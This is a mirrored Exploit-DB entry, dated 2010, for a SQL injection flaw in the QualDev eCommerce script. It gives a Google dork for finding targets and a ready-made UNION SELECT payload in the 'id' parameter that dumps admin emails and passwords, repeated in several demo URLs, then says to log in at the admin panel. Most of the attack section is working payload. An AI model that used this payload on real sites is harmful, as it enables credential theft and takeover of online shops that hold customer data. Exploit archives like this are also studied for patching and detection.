bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15748.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

45 lines
No EOL
1.4 KiB
Text
Raw Blame History

====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================
# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all version
# Category:: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick[at]xaknet[dot]ru
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
Kronus, mst && others)
# Intro:
- A parameter is not properly sanitised before being used in a SQL query.
- Input passed to "id" parameter is not properly
- sanitised before being used in a SQL query. This can be
- exploited to manipulate SQL queries by injecting
- arbitrary SQL code.
# Exploit:
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
logining with admin email && password there
http://victim/adminpanel/
#Demo:
-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
Vizit us at http://xaknet.ru
Reference in a new issue View git blame Copy permalink